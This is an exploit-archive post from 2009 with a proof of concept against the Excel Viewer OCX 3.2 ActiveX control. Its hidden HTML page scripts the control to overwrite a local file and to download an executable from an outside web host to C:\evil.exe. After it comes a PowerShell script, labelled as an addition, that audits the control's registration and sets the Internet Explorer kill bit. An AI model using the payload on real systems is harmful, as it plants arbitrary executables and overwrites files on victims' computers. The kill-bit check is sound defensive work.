ExcelOCX ActiveX 3.2 (Download File) Insecure Method Exploit
Source: www.vfcocus.net Author: Luja Published: 2009-01-13
<html>
<body>
/*
--=0-0-000000000--x==-xxxxxxxxx<br/>
- Excel Viewer OCX 3.2 <br/>
homepage: www.officeocx.com <br/>
download: www.brothersoft.com/excel-viewer-ocx-51797.html <br/>
- RegKey Safe for Script: True<br/>
- RegKey Safe for Init: True <br/>
- Implements IObjectSafety: True <br/>
- IDisp Safe: Safe for untrusted: caller,data <br/>
- IPersist Safe: Safe for untrusted: caller,data <br/>
- IPStorage Safe: Safe for untrusted: caller,data <br/>
- Tested on Avant Browser 11.7.21 ie 6 <br/>
Vuln: <br/>
1) Arbitrary File Download [HttpDownloadFile]<br/>
2) Arbitrary file overwrite [Save] <br/>
<br/>
--==0-0000000011011110=== <br/>
Probably it is the worst app I have ever seen <br/>
It is funny that it is meant as Safe for scripting <br/>
They want to sell it l0l <br/>
---000----------++++---------------000 <br/>
Alfons Luja <br/>
Greetings to my fans <br/>
9002 <br/>
:P <br/>
00 -0000000000000000===------------------x <br/>
*/<br/>
<div style="visibility:hidden;">
<object classid='clsid:18A295DA-088E-42D1-BE31-5028D7F9B965' id='kupa'></object>
<script type="text/javascript">
/*
I don't know why, but this code acts correctly only the first time; later it just crashes IE.
In Avant Browser it is always OK, but it is necessary to wait a long time for it to finish loading - strange :x
*/
try{
  var obj = document.getElementById('kupa');
  var rem = "http://www.adalex.pl/motyl/motyl-radio.exe";
  var loc = "C:\evil.exe";
  obj.Save("C:\owerwrite.ini");
  obj.HttpDownloadFile(rem,loc);
}
catch(err){
  window.alert('Poc failed');
}
</script>
</div>
</body>
</html>
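A defensive check for the control targeted above, as an added example that is not part of the original advisory: it reports whether the CLSID from the PoC's `<object>` tag is registered and marked safe for scripting or initialization, and with the `-SetKillBit` switch (a parameter name chosen for this example) sets the Internet Explorer kill bit for it. It assumes an elevated PowerShell session.

```powershell
# Added example, not from the advisory or the vendor.
# Audits the ActiveX registration and optionally sets the IE kill bit.
param([switch]$SetKillBit)   # hypothetical switch name, chosen for this example

$clsid  = '{18A295DA-088E-42D1-BE31-5028D7F9B965}'   # CLSID taken from the PoC
$catids = [ordered]@{
    '{7DD95801-9882-11CF-9FA9-00AA006C14A4}' = 'Safe for scripting'
    '{7DD95802-9882-11CF-9FA9-00AA006C14A4}' = 'Safe for initialization'
}
$killBit = 0x400   # "Compatibility Flags" value that stops IE from loading the control

# Check the native view and the 32-bit view on 64-bit Windows (WOW6432Node).
$views = @(
    @{ Classes = 'HKLM:\SOFTWARE\Classes\CLSID'
       Compat  = 'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility' },
    @{ Classes = 'HKLM:\SOFTWARE\Classes\WOW6432Node\CLSID'
       Compat  = 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility' }
)

foreach ($v in $views) {
    $ctl = Join-Path $v.Classes $clsid
    if (-not (Test-Path $ctl)) { continue }          # control not installed in this view
    Write-Output "Control registered: $ctl"

    # Registry-based safety marking. The advisory notes the control also
    # implements IObjectSafety, so absence of these keys does not make it safe.
    foreach ($cat in $catids.Keys) {
        if (Test-Path (Join-Path $ctl "Implemented Categories\$cat")) {
            Write-Output "  marked: $($catids[$cat])"
        }
    }

    $kb    = Join-Path $v.Compat $clsid
    $flags = (Get-ItemProperty -Path $kb -Name 'Compatibility Flags' `
                  -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($flags -band $killBit) { Write-Output '  kill bit: set'; continue }

    Write-Output '  kill bit: NOT set'
    if ($SetKillBit) {
        if (-not (Test-Path $kb)) { New-Item -Path $kb -Force | Out-Null }
        # Preserve any existing flags and add the kill bit.
        Set-ItemProperty -Path $kb -Name 'Compatibility Flags' -Type DWord `
            -Value ([int]$flags -bor $killBit)
        Write-Output '  kill bit: written'
    }
}
```

Run without arguments to audit only; uninstalling the control remains the more complete fix where it is not needed.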